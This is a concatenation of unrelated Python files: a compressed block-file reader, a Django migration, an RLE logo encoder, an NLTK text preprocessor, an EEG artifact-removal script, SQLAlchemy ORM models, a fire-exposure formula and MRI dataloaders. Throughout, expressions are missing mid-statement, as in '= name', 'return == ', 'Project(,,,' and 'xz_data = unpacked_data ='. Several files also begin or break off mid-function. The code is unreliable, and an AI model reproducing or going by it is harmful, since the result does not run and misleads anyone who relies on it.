self.main_seg_sum != self.x_overall_sum: self.extra_idxlines.add(self.x_overall_idxline) else: raise FormatError("invalid first byte of compressed block", (self.blk_file, format_byte)) def x_unpack_segs(self, desired_idxline_set): xz_data = unpacked_data = lzma.decompress(xz_data) if self.x_overall_idxline in desired_idxline_set: yield (self.x_overall_idxline, unpacked_data) offset = 0 for idxline in self.x_embedded_idxlines: xseglen, xsegsum = unpack_idxline(idxline) if idxline in desired_idxline_set: yield (idxline, unpacked_data[offset:offset+xseglen]) offset += xseglen if offset != len(unpacked_data): raise FormatError("lzma data len not consistent with seg lens in x header", self.filename) def z_unpack_seg(self): return zlib.decompress( class BlockDirBase(object): def __init__(self, dirname): self.dirname = dirname class FlatBlockDir(BlockDirBase): def filename(self, seg_sum): return os.path.join(self.dirname, seg_sum) class Nest1BlockDir(BlockDirBase): def filename(self, seg_sum): return os.path.join(self.dirname, os.path.join(seg_sum[0], seg_sum)) def BlockDir(dirname): if os.path.exists(os.path.join(dirname, "0")): return Nest1BlockDir(dirname) else: return FlatBlockDir(dirname) class BlockSearchPath(object): def __init__(self, dirnames): self.block_dirs = [BlockDir(d) for d in dirnames] def find_block(self, seg_sum): for bd in self.block_dirs: f = bd.filename(seg_sum) if os.path.exists(f): return f return None def compress_string_to_zfile(src_str, dest_file): f = open(dest_file, 'w') f.write('z') f.write(zlib.compress(src_str, 9)) f.close() def decompress_zfile_to_string(src_file): f = open(src_file) formatbyte = if formatbyte != 'z': raise FormatError("blockfile is not a zlib file", (src_file, formatbyte)) return zlib.decompress(
# pylint: disable=missing-docstring # -1: [too-many-lines] __revision__ = 0 ZERFZAER = 3 HEHEHE = 2
# Generated by Django 2.0.7 on 2018-08-12 22:36 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('UserProfiles', '0005_auto_20180808_2150'), ] operations = [ migrations.AlterField( model_name='userprofilemodel', name='UserProfileBio', field=models.TextField(blank=True, max_length=300, null=True), ), migrations.AlterField( model_name='userprofilemodel', name='UserProfileHeader', field=models.ImageField(default='UserProfiles/Defaults/BlankWhite.png', upload_to='UserProfiles/'), ), migrations.AlterField( model_name='userprofilemodel', name='UserProfileImage', field=models.ImageField(default='UserProfiles/Defaults/Blank.png', upload_to='UserProfiles/'), ), ]
<gh_stars>1-10 def rle(): with open("logo.ascii") as fp: logo ="\n")[:-1] # simple row based rle bits = 5 cur = "." run = 0 buf = list() for row in logo: for c in row: if c == cur: run += 1 else: cur = c buf += [run] run = 1 if run > 2 ** bits - 1: buf += [2 ** bits - 1] buf += [0] run = run - 2 ** bits + 1 # we don't need to append the last run if it's a run of 0's if cur != ".": buf += [run] # iterator to split off the data into chunks def chunks(l, n): ret = list() for b in l: ret += [b] if len(ret) == n: yield ret ret = list() if len(ret) == 0: return while len(ret) % n != 0: ret += [0] yield ret buf2 = list() for b in chunks(buf, 3): i = b[0] | b[1] << 5 | b[2] << 10 | 1 << 15 buf2 += [i & 0xff, i >> 8 & 0xff] return (len(logo[0]), len(logo), buf2) if __name__ == "__main__": (width, height, buf) = rle() # print it as a nasm data directive print("logo_width equ", width) print("logo_height equ", height) print("db " + ", ".join(map(str, buf)))
class C: def __init__(self): self.l = range(10) def __getitem__(self, idx): return self.l[idx] def f(): c = C() total = 0 for _ in xrange(100000): for i in c: total += i print total f()
#!/usr/bin/python import html2text #import tokenizer from nltk.tokenize import MWETokenizer as tokenizer import nltk #from nltk import word_tokenize from nltk.tokenize import WordPunctTokenizer # This is better for sentences containing unicode, like: u"N\u00faria Espert" word_tokenize = WordPunctTokenizer().tokenize #from nltk.corpus import stopwords # Use the PyStemmer stemmer, since it is written in C and is thus much faster than the NLTK porter stemmer import Stemmer #from nltk.stem.porter import PorterStemmer import os.path import re import string STOPFILE = os.path.join(os.path.abspath(os.path.dirname(os.path.realpath(__file__))), "english.stop") stoplist = None _wsre = re.compile("\s+") _alphanumre = re.compile("[\w\-\' ]", re.UNICODE) #stemmer = PorterStemmer() stemmer = Stemmer.Stemmer("english") def textpreprocess(txt, converthtml=True, sentencetokenize=True, removeblanklines=True, replacehyphenbyspace=True, wordtokenize=True, lowercase=True, removestopwords=True, stem=True, removenonalphanumericchars=True, stemlastword=False, stripallwhitespace=False): """ Note: For html2text, one could also use NCleaner (common.html2text.batch_nclean) Note: One could improve the sentence tokenization, by using the original HTML formatting in the tokenization. Note: We use the Porter stemmer. (Optimization: Shouldn't rebuild the PorterStemmer object each time this function is called.) """ if converthtml: txt = html2text.html2text(txt) if sentencetokenize: txts = nltk.word_tokenize(txt) #txts = tokenizer.tokenize(txt.split()) else: txts = [txt] txt = None if removeblanklines: newtxts = [] for t in txts: if len(string.strip(t)) > 0: newtxts.append(t) txts = newtxts if replacehyphenbyspace: txts = [t.replace("-", " ") for t in txts] if wordtokenize: txtwords = [word_tokenize(t) for t in txts] else: txtwords = [string.split(t) for t in txts] txts = None if lowercase: txtwords = [[string.lower(w) for w in t] for t in txtwords] if removestopwords: txtwords = _removestopwords(txtwords) if stem: txtwords = _stem(txtwords) # TODO: Maybe remove Unicode accents? if removenonalphanumericchars: txtwords = _removenonalphanumericchars(txtwords) txtwords = [[w for w in t if w != ""] for t in txtwords] if stemlastword: txtwords = _stemlastword(txtwords) txts = [string.join(words) for words in txtwords] if stripallwhitespace: txts = _stripallwhitespace(txts) return string.join(txts, sep=" ") def _removestopwords(txtwords): global stoplist # stoplist = stopwords.words("english") if stoplist is None: stoplist = frozenset([string.strip(l) for l in open(STOPFILE).readlines()]) return [[w for w in t if w not in stoplist] for t in txtwords] def _stem(txtwords): # stemmer = PorterStemmer() # return [[stemmer.stem(w) for w in t] for t in txtwords] return [stemmer.stemWords(t) for t in txtwords] def _removenonalphanumericchars(txtwords): return [[string.join([c for c in w if is not None], "") for w in t] for t in txtwords] def _stemlastword(txtwords): # return [t[:-1] + [stemmer.stem(t[-1])] for t in txtwords if len(t) > 0] return [t[:-1] + [stemmer.stemWord(t[-1])] for t in txtwords if len(t) > 0] def _stripallwhitespace(txts): return [_wsre.sub("", txt) for txt in txts] if __name__ == "__main__": import sys print textpreprocess('hello how are you sleeping ?') print textpreprocess(
class Project: def __init__(self, name, status=None, description=None): = name self.description = description self.status = status def __repr__(self): return def __eq__(self, other): return == def key(self): return
<filename>util/ import argparse import collections import json import shutil import os def main(): arg_parser = argparse.ArgumentParser() arg_parser.add_argument('input_dump', type=argparse.FileType('r')) arg_parser.add_argument('output_dir') args = arg_parser.parse_args() if not os.path.isdir(args.output_dir): raise Exception('output_dir is not a directory') user_pool = collections.defaultdict( lambda: collections.defaultdict( lambda: collections.defaultdict(list)) ) flv_pool = collections.defaultdict(lambda: collections.defaultdict(dict)) for line in args.input_dump: doc = json.loads(line) if not doc.get('item_added_to_tracker'): continue user = doc['user'].lower() video_id = doc['video_id'] user_pool[user[0:1]][user[0:2]][user].append(video_id) user_pool[user[0:1]][user[0:2]][user] = list(sorted(user_pool[user[0:1]][user[0:2]][user])) flv_urls = [] flv_doc = doc['flv'] flv_keys = tuple(sorted(int(key) for key in flv_doc.keys())) for key in flv_keys: url = flv_doc[str(key)] flv_urls.append(url) flv_pool[video_id[0:2]][video_id[0:3]][video_id] = flv_urls for key, subpool in user_pool.items(): for subkey, subsubpool in subpool.items(): path = 'channel/{0}/data-{1}.json'.format(key, subkey) path = os.path.join(args.output_dir, path) dir_path = os.path.dirname(path) if not os.path.exists(dir_path): os.makedirs(dir_path) with open(path, 'w') as out_file: json.dump(subsubpool, out_file, indent=2) for key, subpool in flv_pool.items(): for subkey, subsubpool in subpool.items(): path = 'video/{0}/data-{1}.json'.format(key, subkey) path = os.path.join(args.output_dir, path) dir_path = os.path.dirname(path) if not os.path.exists(dir_path): os.makedirs(dir_path) with open(path, 'w') as out_file: json.dump(subsubpool, out_file, indent=2) if __name__ == '__main__': main()
# -*- coding: utf-8 -*- """ Created on Fri Jun 21 15:39:43 2019 @author: Manu """ import mne from mne import io import sys sys.path.append('C:/_MANU/_U821/Python_Dev/') import scipy from util import tools,asr,raw_asrcalibration import numpy as np import matplotlib.pyplot as plt from mne.viz import plot_evoked_topo fname = 'C:/_MANU/_U821/_wip/ContextOdd/raw/ANDNI_0001.vhdr' raw = io.read_raw_brainvision(fname, preload = False) picks_eeg = mne.pick_types(, meg=False, eeg=True, eog=False,stim=False, exclude='bads') ListChannels = np.array(['ch_names']) montage = mne.channels.read_montage(kind='standard_1020',ch_names=ListChannels[picks_eeg]) raw = io.read_raw_brainvision(fname, montage=montage, preload = True) picks_eeg = mne.pick_types(, meg=False, eeg=True, eog=False,stim=False, exclude='bads') raw =raw.pick_types( meg=False, eeg=True, eog=False,stim=True, exclude='bads') # ASR Calibration raworig_Data= raw._data l_freq = 2 h_freq = 20 Wn = [l_freq/(['sfreq']/2.), h_freq/(['sfreq']/2.) ] b, a = scipy.signal.iirfilter(N=2, Wn=Wn, btype = 'bandpass', analog = False, ftype = 'butter', output = 'ba') raw._data[picks_eeg,:]=scipy.signal.lfilter(b, a, raworig_Data[picks_eeg,:], axis = 1, zi = None) rawCalibAsr=raw.copy() tmin = 30 tmax = 60 #s rawCalibAsr = rawCalibAsr.crop(tmin=tmin,tmax=tmax) ChanName4VEOG = ['Fp1','Fp2'] # 2 VEOG cutoff = 5 # Makoto preprocessing says best between 10 and 20 Yule_Walker_filtering = True state = raw_asrcalibration.raw_asrcalibration(rawCalibAsr,ChanName4VEOG, cutoff,Yule_Walker_filtering) # ASR process on epoch event_id = {'Std': 1, 'Dev': 2} events_orig,_ = mne.events_from_annotations(raw) ixdev = np.array(np.where(events_orig[:,2]==2)) ixstd= ixdev-1 events = events_orig[np.sort(np.array(np.hstack((ixstd , ixdev)))),:] events = np.squeeze(events, axis=0) tmin, tmax = -0.2, 0.5 raw4detect = raw.copy() raw4detect._data,iirstate = asr.YW_filter(raw._data,['sfreq'],None) ## HERE epochs4Detect = mne.Epochs(raw4detect, events=events, event_id=event_id, tmin=tmin,tmax=tmax, proj=True,baseline=None, reject=None, picks=picks_eeg) epochs_filt = mne.Epochs(raw, events=events, event_id=event_id, tmin=tmin,tmax=tmax, proj=None,baseline=None, reject=None, picks=picks_eeg) Data4detect = epochs4Detect.get_data() Data2Correct = epochs_filt.get_data() DataClean = np.zeros((Data2Correct.shape)) for i_epoch in range(Data4detect.shape[0]): EpochYR = Data4detect[i_epoch,:,:] Epoch2Corr = Data2Correct[i_epoch,:,:] DataClean[i_epoch,:,:] = asr.asr_process_on_epoch(EpochYR,Epoch2Corr,state) epochs_clean = mne.EpochsArray(DataClean,,events=events,event_id=event_id) srate =['sfreq'] evoked_std = epochs_filt['Std'].average(picks=picks_eeg) evoked_dev = epochs_filt['Dev'].average(picks=picks_eeg) evoked_clean_std = epochs_clean['Std'].average(picks=picks_eeg) evoked_clean_dev = epochs_clean['Dev'].average(picks=picks_eeg) evoked_clean_std.first=-200 evoked_clean_std.last= tmax*srate evoked_clean_dev.first=-200 evoked_clean_dev.last= tmax*srate evoked_clean_std.times= np.around(np.linspace(-0.2, tmax, num=DataClean.shape[2]),decimals=3) evoked_clean_dev.times= np.around(np.linspace(-0.2, tmax, num=DataClean.shape[2]),decimals=3) evokeds = [evoked_std, evoked_dev, evoked_clean_std, evoked_clean_dev] colors = 'blue', 'red','steelblue','magenta' plot_evoked_topo(evokeds, color=colors, title='Std Dev', background_color='w') evoked_clean_MMN=evoked_clean_std.copy() = ( - evoked_MMN =evoked_clean_MMN.copy() = ( evokeds_MMN= [evoked_clean_MMN,evoked_MMN] colors = 'red', 'black' plot_evoked_topo(evokeds_MMN, color=colors, title='MMN', background_color='w') kwargs = dict(times=np.arange(-0.1, 0.40, 0.025), vmin=-1.5, vmax=1.5, layout='auto', head_pos=dict(center=(0., 0.), scale=(1., 1.))) evoked_MMN.plot_topomap(**kwargs) evoked_clean_MMN.plot_topomap(**kwargs)
<reponame>MedPy-C/backend import os from .development import Development # from .production import Production # from .test import Test def get_configs(enviroment=None): from mediapp_be.config.test import Test configs = { 'dev': Development, # 'prd': Production, 'test': Test } if not enviroment: enviroment = os.environ.get('MEDIAPP_BE_API_ENV', 'dev') return configs[enviroment]() env = get_configs()
from abc import abstractmethod from typing import Any, Dict, Iterable, List, Optional, Type, TypeVar from pyjackson import dumps, loads from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Text, UniqueConstraint from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import relationship from ebonite.core.objects import DatasetType from ebonite.core.objects.artifacts import ArtifactCollection from ebonite.core.objects.core import (Buildable, EvaluationResults, EvaluationSet, Image, Model, Pipeline, PipelineStep, Project, RuntimeEnvironment, RuntimeInstance, Task) from ebonite.core.objects.dataset_source import DatasetSource from ebonite.core.objects.metric import Metric from ebonite.core.objects.requirements import Requirements SQL_OBJECT_FIELD = '_sqlalchemy_object' def json_column(): return Column(Text) def safe_loads(payload, as_class): return loads(payload, Optional[as_class]) def sqlobject(obj): return getattr(obj, SQL_OBJECT_FIELD, None) def update_attrs(obj, **attrs): for name, value in attrs.items(): setattr(obj, name, value) T = TypeVar('T') S = TypeVar('S', bound='Attaching') class Attaching: id = ... name = ... def attach(self, obj): setattr(obj, SQL_OBJECT_FIELD, self) return obj @classmethod def from_obj(cls: Type[S], obj: T, new=False) -> S: kwargs = cls.get_kwargs(obj) existing = sqlobject(obj) if not new and existing is not None: update_attrs(existing, **kwargs) return existing return cls(**kwargs) @classmethod @abstractmethod def get_kwargs(cls, obj: T) -> dict: pass # pragma: no cover @abstractmethod def to_obj(self) -> T: pass # pragma: no cover Base = declarative_base() class SProject(Base, Attaching): __tablename__ = 'projects' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=True, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) tasks: Iterable['STask'] = relationship("STask", back_populates="project") def to_obj(self) -> Project: p = Project(,,, creation_date=self.creation_date) for task in self.tasks: p._tasks.add(task.to_obj()) return self.attach(p) @classmethod def get_kwargs(cls, project: Project) -> dict: return dict(,,, creation_date=project.creation_date, tasks=[STask.from_obj(t) for t in project.tasks.values()]) class STask(Base, Attaching): __tablename__ = 'tasks' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) project_id = Column(Integer, ForeignKey(''), nullable=False) project = relationship("SProject", back_populates="tasks") models: Iterable['SModel'] = relationship("SModel", back_populates="task") pipelines: Iterable['SPipeline'] = relationship("SPipeline", back_populates='task') images: Iterable['SImage'] = relationship("SImage", back_populates='task') datasets = Column(Text) metrics = Column(Text) evaluation_sets = Column(Text) __table_args__ = (UniqueConstraint('name', 'project_id', name='tasks_name_and_ref'),) def to_obj(self) -> Task: task = Task(,,, creation_date=self.creation_date, project_id=self.project_id, datasets=safe_loads(self.datasets, Dict[str, DatasetSource]), metrics=safe_loads(self.metrics, Dict[str, Metric]), evaluation_sets=safe_loads(self.evaluation_sets, Dict[str, EvaluationSet])) for model in self.models: task._models.add(model.to_obj()) for pipeline in self.pipelines: task._pipelines.add(pipeline.to_obj()) for image in self.images: task._images.add(image.to_obj()) return self.attach(task) @classmethod def get_kwargs(cls, task: Task) -> dict: return dict(,,, creation_date=task.creation_date, project_id=task.project_id, models=[SModel.from_obj(m) for m in task.models.values()], images=[SImage.from_obj(i) for i in task.images.values()], pipelines=[SPipeline.from_obj(p) for p in task.pipelines.values()], datasets=dumps(task.datasets), metrics=dumps(task.metrics), evaluation_sets=dumps(task.evaluation_sets)) class SModel(Base, Attaching): __tablename__ = 'models' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) wrapper = Column(Text) artifact = Column(Text) requirements = Column(Text) description = Column(Text) params = Column(Text) task_id = Column(Integer, ForeignKey(''), nullable=False) task = relationship("STask", back_populates="models") evaluations = Column(Text) __table_args__ = (UniqueConstraint('name', 'task_id', name='models_name_and_ref'),) def to_obj(self) -> Model: model = Model(, wrapper_meta=safe_loads(self.wrapper, dict),, creation_date=self.creation_date, artifact=safe_loads(self.artifact, ArtifactCollection), requirements=safe_loads(self.requirements, Requirements), description=self.description, params=safe_loads(self.params, Dict[str, Any]),, task_id=self.task_id, evaluations=safe_loads(self.evaluations, Dict[str, EvaluationResults])) return self.attach(model) @classmethod def get_kwargs(cls, model: Model) -> dict: return dict(,,, creation_date=model.creation_date, wrapper=dumps(model.wrapper_meta), artifact=dumps(model.artifact), requirements=dumps(model.requirements), description=model.description, params=dumps(model.params), task_id=model.task_id, evaluations=dumps(model.evaluations)) class SPipeline(Base, Attaching): __tablename__ = 'pipelines' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) steps = Column(Text) input_data = Column(Text) output_data = Column(Text) task_id = Column(Integer, ForeignKey(''), nullable=False) task = relationship("STask", back_populates="pipelines") evaluations = Column(Text) __table_args__ = (UniqueConstraint('name', 'task_id', name='pipelines_name_and_ref'),) def to_obj(self) -> Pipeline: pipeline = Pipeline(, steps=safe_loads(self.steps, List[PipelineStep]), input_data=safe_loads(self.input_data, DatasetType), output_data=safe_loads(self.output_data, DatasetType),, creation_date=self.creation_date,, task_id=self.task_id, evaluations=safe_loads(self.evaluations, EvaluationResults)) return self.attach(pipeline) @classmethod def get_kwargs(cls, pipeline: Pipeline) -> dict: return dict(,,, creation_date=pipeline.creation_date, steps=dumps(pipeline.steps), input_data=dumps(pipeline.input_data), output_data=dumps(pipeline.output_data), task_id=pipeline.task_id, evaluations=dumps(pipeline.evaluations)) class SImage(Base, Attaching): __tablename__ = 'images' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) task_id = Column(Integer, ForeignKey(''), nullable=False) task = relationship("STask", back_populates="images") environment_id = Column(Integer, ForeignKey(''), nullable=False) params = Column(Text) source = Column(Text) __table_args__ = (UniqueConstraint('name', 'task_id', name='image_name_and_ref'),) def to_obj(self) -> Image: image = Image(,, creation_date=self.creation_date,, task_id=self.task_id, params=safe_loads(self.params, Image.Params), source=safe_loads(self.source, Buildable), environment_id=self.environment_id) return self.attach(image) @classmethod def get_kwargs(cls, image: Image) -> dict: return dict(,,, creation_date=image.creation_date, task_id=image.task_id, params=dumps(image.params), source=dumps(image.source), environment_id=image.environment_id) class SRuntimeEnvironment(Base, Attaching): __tablename__ = 'environments' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=True, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) params = Column(Text) def to_obj(self) -> RuntimeEnvironment: environment = RuntimeEnvironment(,, creation_date=self.creation_date,, params=safe_loads(self.params, RuntimeEnvironment.Params)) return self.attach(environment) @classmethod def get_kwargs(cls, environment: RuntimeEnvironment) -> dict: return dict(,,, creation_date=environment.creation_date, params=dumps(environment.params)) class SRuntimeInstance(Base, Attaching): __tablename__ = 'instances' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) image_id = Column(Integer, ForeignKey(''), nullable=False) environment_id = Column(Integer, ForeignKey(''), nullable=False) params = Column(Text) __table_args__ = (UniqueConstraint('name', 'image_id', 'environment_id', name='instance_name_and_ref'),) def to_obj(self) -> RuntimeInstance: instance = RuntimeInstance(,, creation_date=self.creation_date,, image_id=self.image_id, environment_id=self.environment_id, params=safe_loads(self.params, RuntimeInstance.Params)) return self.attach(instance) @classmethod def get_kwargs(cls, instance: RuntimeInstance) -> dict: return dict(,,, creation_date=instance.creation_date, image_id=instance.image_id, environment_id=instance.environment_id, params=dumps(instance.params))
# -*- coding: utf-8 -*- import numpy as np def annex_b_equivalent_time_of_fire_exposure( q_fk, delta_1, m, k_b, A_f, H, A_vh, A_vv, delta_h ): """Calculates time equivalence of standard fire exposure in accordance with PD 6688-1-2 Annex B IAN FU 12 APRIL 2019 :param q_fk: [MJ/m2] Fire load density :param delta_1: Active suppression factor :param m: Combustion factor :param k_b: Conversion factor :param A_f: [m2] Floor area of the compartment :param H: [m] Height of the compartment :param A_vh: [m2] Horizontal area :param A_vv: [m2] Vertical area :param delta_h: Height factor :return: Equivalent time exposure SUPPLEMENT INFO: Table A.4 - Design fire growth rates (from PD 7974-1:2003, Table 3) | BUILDING | USE | |------------------------------------------------------------------|------------| | Picture gallery | Slow | | Passenger stations and termini for air_ rail_ road or sea travel | Slow | | Classroom (school) | Medium | | Dwelling | Medium | | Office | Medium | | Hotel reception | Medium | | Hotel bedroom | Medium | | Hospital room | Medium | | Library | Fast | | Theatre (cinema) | Fast | | Shop | Fast | | Industrial storage or plant room | Ultra-fast | Table A.5 - Heat release rate per unit area of fire for different occupancies (from PD 7974-1:2003) | OCCUPANCY | HEAT RELEASE RATE PER UNIT AREA | $Q''$ [kW/m2] | | |-------------|---------------------------------|---------------|---| | Shops | 550 | | | | Offices | 290 | | | | Hotel rooms | 249 | | | | Industrial | 86-620 | | | EXAMPLE: >>> kwargs = dict(q_fk=900, delta_1=0.61, m=1, k_b=0.09, H=4, A_f=856.5, A_vh=0, A_vv=235.2, delta_h=2) >>> print(annex_b_equivalent_time_of_fire_exposure(**kwargs)) >>> 74.27814882871894 """ # B.1 # Design fire load [MJ/m2] q_fd = q_fk * delta_1 * m # B.2 # Vertical opening factor alpha_v = min([max([A_vv / A_f, 0.025]), 0.25]) # horizontal opening factor alpha_h = A_vh / A_f # just a factor b_v = ( 12.5 * (1 + 10 * alpha_v - alpha_v ** 2) if (12.5 * (1 + 10 * alpha_v - alpha_v ** 2)) >= 10 else np.nan ) # total ventilation factor w_f = ((6 / H) ** 0.3) * ((0.62 + 90 * (0.4 - alpha_v) ** 4) / (1 + b_v * alpha_h)) w_f = w_f if A_f >= 100 else np.nan return q_fd * k_b * w_f * delta_h if __name__ == "__main__": input_params = dict( q_fk=900, delta_1=0.61, m=1, k_b=0.09, H=4, A_f=856.5, A_vh=0, A_vv=235.2, delta_h=2, ) input_params = dict( q_fk=900, delta_1=1.0, m=1, k_b=0.09, H=4, A_f=877, A_vh=0, A_vv=98.35, delta_h=2, ) res = annex_b_equivalent_time_of_fire_exposure(**input_params) print(res / 60)
<reponame>colorfulbrain/brain2020 from __future__ import print_function, division import os import torch import numpy as np from import Dataset, DataLoader from utils import PatchGenerator, padding, read_csv, read_csv_complete, read_csv_complete_apoe, get_AD_risk import random import pandas as pd import csv """ dataloaders are defined in this scripts: 1. FCN dataloader (data split into 60% train, 20% validation and 20% testing) (a). Training stage: use random patches to train classification FCN model (b). Validation stage: forward whole volume MRI to FCN to get Disease Probability Map (DPM). use MCC of DPM as criterion to save model parameters (c). Testing stage: get all available DPMs for the development of MLP 2. MLP dataloader (use the exactly same split as FCN dataloader) (a). Training stage: train MLP on DPMs from the training portion (b). Validation stage: use MCC as criterion to save model parameters (c). Testing stage: test the model on ADNI_test, NACC, FHS and AIBL datasets 3. CNN dataloader (baseline classification model to be compared with FCN+MLP framework) (a). Training stage: use whole volume to train classification FCN model (b). Validation stage: use MCC as criterion to save model parameters (c). Testing stage: test the model on ADNI_test, NACC, FHS and AIBL datasets """ class Augment: def __init__(self): self.contrast_factor = 0.2 self.bright_factor = 0.4 self.sig_factor = 0.2 def change_contrast(self, image): ratio = 1 + (random.random() - 0.5)*self.contrast_factor return image.mean() + ratio*(image - image.mean()) def change_brightness(self, image): val = (random.random() - 0.5)*self.bright_factor return image + val def add_noise(self, image): sig = random.random() * self.sig_factor return np.random.normal(0, sig, image.shape) + image def apply(self, image): image = self.change_contrast(image) image = self.change_brightness(image) image = self.add_noise(image) return image class CNN_Data(Dataset): """ csv files ./lookuptxt/*.csv contains MRI filenames along with demographic and diagnosis information """ def __init__(self, Data_dir, exp_idx, stage, seed=1000): random.seed(seed) self.Data_dir = Data_dir if stage in ['train', 'valid', 'test']: self.Data_list, self.Label_list = read_csv('./lookupcsv/exp{}/{}.csv'.format(exp_idx, stage)) elif stage in ['ADNI', 'NACC', 'AIBL', 'FHS']: self.Data_list, self.Label_list = read_csv('./lookupcsv/{}.csv'.format(stage)) def __len__(self): return len(self.Data_list) def __getitem__(self, idx): label = self.Label_list[idx] data = np.load(self.Data_dir + self.Data_list[idx] + '.npy').astype(np.float32) data = np.expand_dims(data, axis=0) return data, label def get_sample_weights(self): count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(self.Label_list.count(1)) weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list] return weights, count0 / count1 class FCN_Data(CNN_Data): def __init__(self, Data_dir, exp_idx, stage, whole_volume=False, seed=1000, patch_size=47, transform=Augment()): """ :param Data_dir: data path :param exp_idx: experiment index maps to different data splits :param stage: stage could be 'train', 'valid', 'test' and etc ... :param whole_volume: if whole_volume == True, get whole MRI; if whole_volume == False and stage == 'train', sample patches for training :param seed: random seed :param patch_size: patch size has to be 47, otherwise model needs to be changed accordingly :param transform: transform is about data augmentation, if transform == None: no augmentation for more details, see Augment class """ CNN_Data.__init__(self, Data_dir, exp_idx, stage, seed) self.stage = stage self.transform = transform self.whole = whole_volume self.patch_size = patch_size self.patch_sampler = PatchGenerator(patch_size=self.patch_size) def __getitem__(self, idx): label = self.Label_list[idx] if self.stage == 'train' and not self.whole: data = np.load(self.Data_dir + self.Data_list[idx] + '.npy', mmap_mode='r').astype(np.float32) patch = self.patch_sampler.random_sample(data) if self.transform: patch = self.transform.apply(patch).astype(np.float32) patch = np.expand_dims(patch, axis=0) return patch, label else: data = np.load(self.Data_dir + self.Data_list[idx] + '.npy').astype(np.float32) data = np.expand_dims(padding(data, win_size=self.patch_size // 2), axis=0) return data, label class MLP_Data(Dataset): def __init__(self, Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed=1000): random.seed(seed) self.exp_idx = exp_idx self.Data_dir = Data_dir self.roi_threshold = roi_threshold self.roi_count = roi_count if choice == 'count': self.select_roi_count() else: self.select_roi_thres() if stage in ['train', 'valid', 'test']: self.path = './lookupcsv/exp{}/{}.csv'.format(exp_idx, stage) else: self.path = './lookupcsv/{}.csv'.format(stage) self.Data_list, self.Label_list, self.demor_list = read_csv_complete(self.path) self.risk_list = [get_AD_risk(np.load(Data_dir+filename+'.npy'))[self.roi] for filename in self.Data_list] self.in_size = self.risk_list[0].shape[0] def select_roi_thres(self): self.roi = np.load('./DPMs/fcn_exp{}/train_MCC.npy'.format(self.exp_idx)) self.roi = self.roi > self.roi_threshold for i in range(self.roi.shape[0]): for j in range(self.roi.shape[1]): for k in range(self.roi.shape[2]): if i%3!=0 or j%2!=0 or k%3!=0: self.roi[i,j,k] = False def select_roi_count(self): self.roi = np.load('./DPMs/fcn_exp{}/train_MCC.npy'.format(self.exp_idx)) tmp = [] for i in range(self.roi.shape[0]): for j in range(self.roi.shape[1]): for k in range(self.roi.shape[2]): if i%3!=0 or j%2!=0 or k%3!=0: continue tmp.append((self.roi[i,j,k], i, j, k)) tmp.sort() tmp = tmp[-self.roi_count:] self.roi = self.roi != self.roi for _, i, j, k in tmp: self.roi[i,j,k] = True def __len__(self): return len(self.Data_list) def __getitem__(self, idx): label = self.Label_list[idx] risk = self.risk_list[idx] demor = self.demor_list[idx] return risk, label, np.asarray(demor).astype(np.float32) def get_sample_weights(self): count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float(self.Label_list.count(1)) weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list] return weights, count0 / count1 class MLP_Data_apoe(MLP_Data): def __init__(self, Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed=1000): super().__init__(Data_dir, exp_idx, stage, roi_threshold, roi_count, choice, seed) self.Data_list, self.Label_list, self.demor_list = read_csv_complete_apoe(self.path) class CNN_MLP_Data(Dataset): def __init__(self, Data_dir, exp_idx, stage, seed=1000): random.seed(seed) self.exp_idx = exp_idx self.Data_dir = Data_dir if stage in ['train', 'valid', 'test']: path = './lookupcsv/exp{}/{}.csv'.format(exp_idx, stage) else: path = './lookupcsv/{}.csv'.format(stage) self.Data_list, self.Label_list, self.demor_list = read_csv_complete(path) self.risk_list = [np.load(Data_dir + filename + '.npy') for filename in self.Data_list] self.risk_list = [self.rescale(a) for a in self.risk_list] self.in_size = self.risk_list[0].shape[0] def __len__(self): return len(self.Data_list) def __getitem__(self, idx): label = self.Label_list[idx] risk = self.risk_list[idx] demor = self.demor_list[idx] return risk, label, np.asarray(demor).astype(np.float32) def rescale(self, x): return (x + 8) / 20.0 def get_sample_weights(self): count, count0, count1 = float(len(self.Label_list)), float(self.Label_list.count(0)), float( self.Label_list.count(1)) weights = [count / count0 if i == 0 else count / count1 for i in self.Label_list] return weights, count0 / count1 if __name__ == "__main__": data = CNN_MLP_Data(Data_dir='./DPMs/cnn_exp1/', exp_idx=1, stage='train') dataloader = DataLoader(data, batch_size=10, shuffle=False) for risk, label, demor in dataloader: print(risk.shape, label, demor)
